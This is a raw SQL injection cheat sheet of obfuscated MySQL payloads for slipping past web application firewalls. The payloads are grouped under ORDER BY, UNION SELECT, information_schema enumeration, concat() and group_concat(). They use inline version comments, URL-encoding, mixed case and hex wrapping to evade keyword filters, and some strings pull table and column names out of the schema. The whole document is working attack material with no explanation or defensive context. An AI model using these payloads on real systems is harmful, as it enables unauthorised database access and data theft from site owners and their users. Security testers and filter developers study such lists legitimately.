~] order by [~] | |
/**/ORDER/**/BY/**/ | |
/*!order*/+/*!by*/ | |
/*!ORDER BY*/ | |
/*!50000ORDER BY*/ | |
/*!50000ORDER*//**//*!50000BY*/ | |
/*!12345ORDER*/+/*!BY*/ | |
[~] UNION select [~] | |
/*!50000%55nIoN*/ /*!50000%53eLeCt*/ | |
%55nion(%53elect 1,2,3)-- - | |
+union+distinct+select+ | |
+union+distinctROW+select+ | |
/**//*!12345UNION SELECT*//**/ | |
/**//*!50000UNION SELECT*//**/ | |
/**/UNION/**//*!50000SELECT*//**/ | |
/*!50000UniON SeLeCt*/ | |
union /*!50000%53elect*/ | |
+#uNiOn+#sEleCt | |
+#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
/*!%55NiOn*/ /*!%53eLEct*/ | |
/*!u%6eion*/ /*!se%6cect*/ | |
+un/**/ion+se/**/lect | |
uni%0bon+se%0blect | |
%2f**%2funion%2f**%2fselect | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
REVERSE(noinu)+REVERSE(tceles) | |
/*--*/union/*--*/select/*--*/ | |
union (/*!/**/ SeleCT */ 1,2,3) | |
/*!union*/+/*!select*/ | |
union+/*!select*/ | |
/**/union/**/select/**/ | |
/**/uNIon/**/sEleCt/**/ | |
+%2F**/+Union/*!select*/ | |
/**//*!union*//**//*!select*//**/ | |
/*!uNIOn*/ /*!SelECt*/ | |
+union+distinct+select+ | |
+union+distinctROW+select+ | |
uNiOn aLl sElEcT | |
UNIunionON+SELselectECT | |
/**/union/*!50000select*//**/ | |
0%a0union%a0select%09 | |
%0Aunion%0Aselect%0A | |
%55nion/**/%53elect | |
uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ | |
%0A%09UNION%0CSELECT%10NULL% | |
/*!union*//*--*//*!all*//*--*//*!select*/ | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
union+sel%0bect | |
+uni*on+sel*ect+ | |
+#1q%0Aunion all#qa%0A#%0Aselect | |
union(select (1),(2),(3),(4),(5)) | |
UNION(SELECT(column)FROM(table)) | |
%23xyz%0AUnIOn%23xyz%0ASeLecT+ | |
%23xyz%0A%55nIOn%23xyz%0A%53eLecT+ | |
union(select(1),2,3) | |
union (select 1111,2222,3333) | |
uNioN (/*!/**/ SeleCT */ 11) | |
union (select 1111,2222,3333) | |
+#1q%0AuNiOn all#qa%0A#%0AsEleCt | |
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/ | |
%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/ | |
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ | |
+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C | |
/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/ | |
+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+ | |
/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/ | |
/union\sselect/g | |
/union\s+select/i | |
/*!UnIoN*/SeLeCT | |
+UnIoN/*&a=*/SeLeCT/*&a=*/ | |
+uni>on+sel>ect+ | |
+(UnIoN)+(SelECT)+ | |
+(UnI)(oN)+(SeL)(EcT) | |
+’UnI”On’+'SeL”ECT’ | |
+uni on+sel ect+ | |
+/*!UnIoN*/+/*!SeLeCt*/+ | |
/*!u%6eion*/ /*!se%6cect*/ | |
uni%20union%20/*!select*/%20 | |
union%23aa%0Aselect | |
/**/union/*!50000select*/ | |
/^.*union.*$/ /^.*select.*$/ | |
/*union*/union/*select*/select+ | |
/*uni X on*/union/*sel X ect*/ | |
+un/**/ion+sel/**/ect+ | |
+UnIOn%0d%0aSeleCt%0d%0a | |
UNION/*&test=1*/SELECT/*&pwn=2*/ | |
un?<ion sel="">+un/**/ion+se/**/lect+ | |
+UNunionION+SEselectLECT+ | |
+uni%0bon+se%0blect+ | |
%252f%252a*/union%252f%252a /select%252f%252a*/ | |
/%2A%2A/union/%2A%2A/select/%2A%2A/ | |
%2f**%2funion%2f**%2fselect%2f**%2f | |
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A | |
/*!UnIoN*/SeLecT+ | |
[~] information_schema.tables [~] | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- - | |
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- - | |
/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table | |
/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table | |
[~] concat() [~] | |
CoNcAt() | |
concat() | |
CON%08CAT() | |
CoNcAt() | |
%0AcOnCat() | |
/**//*!12345cOnCat*/ | |
/*!50000cOnCat*/(/*!*/) | |
unhex(hex(concat(table_name))) | |
unhex(hex(/*!12345concat*/(table_name))) | |
unhex(hex(/*!50000concat*/(table_name))) | |
[~] group_concat() [~] | |
/*!group_concat*/() | |
gRoUp_cOnCAt() | |
group_concat(/*!*/) | |
group_concat(/*!12345table_name*/) | |
group_concat(/*!50000table_name*/) | |
/*!group_concat*/(/*!12345table_name*/) | |
/*!group_concat*/(/*!50000table_name*/) | |
/*!12345group_concat*/(/*!12345table_name*/) | |
/*!50000group_concat*/(/*!50000table_name*/) | |
/*!GrOuP_ConCaT*/() | |
/*!12345GroUP_ConCat*/() | |
/*!50000gRouP_cOnCaT*/() | |
/*!50000Gr%6fuP_c%6fnCAT*/() | |
unhex(hex(group_concat(table_name))) | |
unhex(hex(/*!group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!12345group_concat*/(table_name))) | |
unhex(hex(/*!12345group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!12345group_concat*/(/*!12345table_name*/))) | |
unhex(hex(/*!50000group_concat*/(table_name))) | |
unhex(hex(/*!50000group_concat*/(/*!table_name*/))) | |
unhex(hex(/*!50000group_concat*/(/*!50000table_name*/))) | |
convert(group_concat(table_name)+using+ascii) | |
convert(group_concat(/*!table_name*/)+using+ascii) | |
convert(group_concat(/*!12345table_name*/)+using+ascii) | |
convert(group_concat(/*!50000table_name*/)+using+ascii) | |
CONVERT(group_concat(table_name)+USING+latin1) | |
CONVERT(group_concat(table_name)+USING+latin2) | |
CONVERT(group_concat(table_name)+USING+latin3) | |
CONVERT(group_concat(table_name)+USING+latin4) | |
CONVERT(group_concat(table_name)+USING+latin5) |